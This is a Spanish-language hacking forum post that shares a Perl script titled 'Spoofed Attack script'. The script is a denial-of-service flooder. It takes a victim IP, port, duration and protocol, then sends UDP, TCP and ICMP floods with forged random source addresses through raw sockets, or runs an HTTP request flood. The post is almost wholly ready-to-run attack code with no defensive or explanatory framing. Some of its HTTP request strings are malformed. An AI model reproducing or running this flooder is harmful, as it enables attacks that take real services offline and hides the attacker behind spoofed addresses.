Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] - Spoofed Attack script

  • 0 Respuestas
  • 5125 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« en: Julio 24, 2017, 10:12:10 am »

Código: Perl
  1. #!/usr/bin/perluse Term::ANSIColor;
  2. use Net::RawIP;
  3. use IO::Socket::INET;
  4.  
  5.  
  6. ( $PROG = $0 ) =~ s/^.*[\/\\]//;
  7.  
  8.  
  9. if ( @ARGV == 0 ) {
  10.         print "Usage : ./$PROG [IP] [Port] [Time] [Protocol] \n\n";
  11.         print "Protocols :  \n\n-UDP\n-TCP\n-ICMP\n-HTTP\n";
  12.     exit;
  13. }
  14.  
  15.  
  16. my $size = 'ABABABAZERTYUIOP1234567890CD123456789AZERTYUIOPQSDFGHJKLMEFGHIJKLMNOPKRSTUVWXYZ​CDEFEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrGEFGHIJKLMNOPQRSTUVWXYZ1234​56789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKL​MNOPQRSTUVWXYZ123456789abcdefghijklmnopqrHIJKLMNOPQREFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKLMN​OPQRSTUVWXYZ123456789abcdefghijklmnopqrSTUVWXYZ123456789abcdefghijklmnopqrstuvwx​yzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ​RSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789a​bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrst​uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM​NOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS​TUVWXYZ123456789abcdefghijklmnopqrstuvwxyz';
  17. my $victime = $ARGV[0];
  18. my $port = $ARGV[1];
  19. my $temps = $ARGV[2];
  20. my $proto = $ARGV[3];
  21. $endtime = time() + ($temps ? $temps : 1000000);
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36. my @referer = ('http://www.google.com/url?sa=t&rct=j&q=&eip_source=s&source=web&cd=1&url=$victime');
  37.  
  38.  
  39. my @agent = ('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
  40. 'Mozilla/5.0 (Windows; I; Windows NT 5.1; ru; rv:1.9.2.13)',
  41. 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
  42. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:21.0) Gecko/20100101 Firefox/21.0',
  43. 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)',
  44. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
  45. 'Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; LNV-Lenovo K910e/S100; 1080*1920; CTC/2.0) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safa',
  46. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
  47. 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1',
  48. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
  49. 'Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]',
  50. 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
  51. 'Lynx/2.8.8dev.12 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/2.12.14',
  52. 'Opera/9.20 (Windows NT 6.0; U; en)',
  53. 'Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
  54. 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  55. 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  56. 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  57. 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  58. 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  59. 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  60. 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  61. 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
  62. 'Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
  63. 'Mozilla/5.0 (compatible; Konqueror/3.5; SunOS)',
  64. 'Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)',
  65. 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
  66. 'Mozilla/5.0 (X11) KHTML/4.9.1 (like Gecko) Konqueror/4.9)');
  67.  
  68.  
  69. my $foke =
  70. "\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30".
  71. "\x48\x6f\x73\x74\x3a\x20\0x687474703a2f2f", pack("H*", $victime).
  72. "\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e​\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x75\x72\x6c\x3f\x73\x61\x3d\x74\x26​\x72\x63\x74\x3d\x6a\x26\x71\x3d\x26\x65\x73\x72\x63\x3d\x73\x26\x73\x6f\x75\x72​\x63\x65\x3d\x77\x65\x62\x26\x63\x64\x3d\x31\x26\x75\x72\x6c\x3d\0x687474703a2f2​f", pack("H*", $victime).
  73. "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69​\x76\x65";
  74.  
  75.  
  76. my $reqq =
  77. "POST / HTTP/1.0\r\n".
  78. "Referer: {foreach (sort {int(rand(1))-1} @referer)}\r\n".
  79. "Content-Type: application/x-www-form-urlencoded\r\n".
  80. "Connection: Keep-Alive\r\n".
  81. "User-Agent: {foreach (sort {int(rand(1))-1} @agent)}\r\n".
  82. "Host: $victime\r\n".
  83. "\r\n".
  84. "skype=00000&host=00000&login=00000&password=00000&pseudo=00000&about=00000&test=00000&home=00000&page=00000&pages=00000&info=00000&infos=00000&check=00000&verif=00000&port=00000&time=00000&temps=00000&key=00000&news=00000&submit=00000&msg=00000&message=00000&link=00000&url=00000&email=00000@00000.cn&mail=00000@00000.cn&show=00000&id=00000\r\n";
  85.  
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101. if( $proto eq 'UDP' )
  102.  
  103.  
  104.                 {
  105.                
  106.  
  107.  
  108. print "\033[2J";    #clear the screen
  109. print "\033[0;0H"; #jump to 0,0
  110.  
  111.  
  112.  
  113.  
  114.                
  115.                     print color ("red"),"[+]",color("reset"),"Start Flooding .... ";
  116.                     print color ("red"),"[+]",color("reset"),"\n";
  117.                     for (;time() <= $endtime;) {
  118.                                                     my $port_source = int(rand(65534)+1);
  119.                                                     my $ip_source = join ".", map int rand 255, 1 .. 4;
  120.                                                    
  121.                                                     my $sport = int(rand(255));
  122.                                                     $frag = int(rand(2));
  123.  
  124.  
  125.                                                     my $packet = new Net::RawIP({
  126.                                                             ip => {
  127.                                                                     saddr => $ip_source,
  128.                                                                     daddr => $victime,
  129.                                                                     frag_off => $frag,
  130.                                                                     },
  131.                                                             udp => {
  132.                                                                     source => $sport,
  133.                                                                     dest => $port,
  134.                                                                     data=> $size,
  135.                                                                     }
  136.                                                                                 });
  137.  
  138.  
  139.                                                     $packet->send;
  140.      
  141.      
  142.                                                 }
  143.        
  144.                 }
  145.    
  146.  
  147.  
  148.    
  149.  
  150. if( $proto eq 'TCP' ) {
  151. print "\033[2J";    #clear the screen
  152. print "\033[0;0H"; #jump to 0,0
  153.  
  154.  
  155.         print color ("red"),"[+]",color("reset"),"Start Flooding ....";
  156.                     print color ("red"),"[+]",color("reset"),"\n";
  157.  
  158.  
  159.     for (;time() <= $endtime;) {
  160.  
  161.  
  162.         my( $pktct, $sport, $frag, $urg, $psh, $rst, $fin, $syn, $ack);
  163.         my $port_source = int(rand(65534)+1);
  164.         my $ip_source = join ".", map int rand 255, 1 .. 4;
  165.        
  166.  
  167.  
  168.    
  169.         $frag = int(rand(2));
  170.         $urg = int(rand(2));
  171.         $psh = int(rand(2));
  172.         $rst = int(rand(2));
  173.         $fin = int(rand(2));
  174.         $syn = int(rand(2));
  175.         $ack = int(rand(2));
  176.      
  177.  
  178.  
  179.         my $packet = new Net::RawIP({
  180.             ip => {
  181.                 saddr => $ip_source,
  182.                 daddr => $victime,
  183.                 frag_off => $frag,
  184.                   },
  185.             tcp => {
  186.                 source => $port_source,
  187.                 dest => $port,
  188.                 urg => $urg,
  189.                 psh => $psh,
  190.                 rst => $rst,
  191.                 fin => $fin,
  192.                 syn => $syn,
  193.                 ack => $ack,
  194.                 data => $size,
  195.                     }
  196.                                     });
  197.  
  198.  
  199.         $packet->send;
  200.      
  201.      
  202.                                     }
  203.        
  204.                                 }
  205.    
  206.    
  207.    
  208.    
  209.     if( $proto eq 'ICMP' ) {
  210.    
  211.     print "\033[2J";    #clear the screen
  212. print "\033[0;0H"; #jump to 0,0
  213.     print color ("red"),"[+]",color("reset"),"Start Flooding ....";
  214.                     print color ("red"),"[+]",color("reset"),"\n";
  215. for (;time() <= $endtime;) {
  216.  
  217.  
  218.     my($pktct, $code, $type, $frag);
  219.          my $port_source = int(rand(65534)+1);
  220.      my $ip_source = join ".", map int rand 255, 1 .. 4;
  221.    
  222.  
  223.  
  224.  
  225.  
  226.      $code = int(rand(255));
  227.       $type = int(rand(255));
  228.       $frag = int(rand(2));
  229.      
  230.  
  231.  
  232.        my $packet = new Net::RawIP({
  233.          ip => {
  234.             saddr =>$ip_source,
  235.             daddr => $victime,
  236.             frag_off => $frag,
  237.          },
  238.          icmp => {
  239.             code => $code,
  240.             type => $type,
  241.          }
  242.       });
  243.  
  244.  
  245.       $packet->send;
  246.      
  247.      
  248.        }
  249.        
  250.    }
  251.    
  252.    
  253.    
  254.    
  255.     if( $proto eq 'HTTP' ) {
  256.     print "\033[2J";    #clear the screen
  257. print "\033[0;0H"; #jump to 0,0
  258.     print color ("red"),"[+]",color("reset"),"Start Flooding ....";
  259.                     print color ("red"),"[+]",color("reset"),"\n";
  260.  
  261.  
  262. for (;time() <= $endtime;) {
  263.        
  264.        
  265.        
  266.  
  267.  
  268. $sock = IO::Socket::INET->new(PeerAddr => $victime, PeerPort => 80, Proto => "tcp") or next;
  269. print $sock $reqq;
  270. print $sock $foke;
  271. close($sock);
  272.        }
  273.        
  274.    }

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3759
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1692
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1462
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 1417
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1989
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d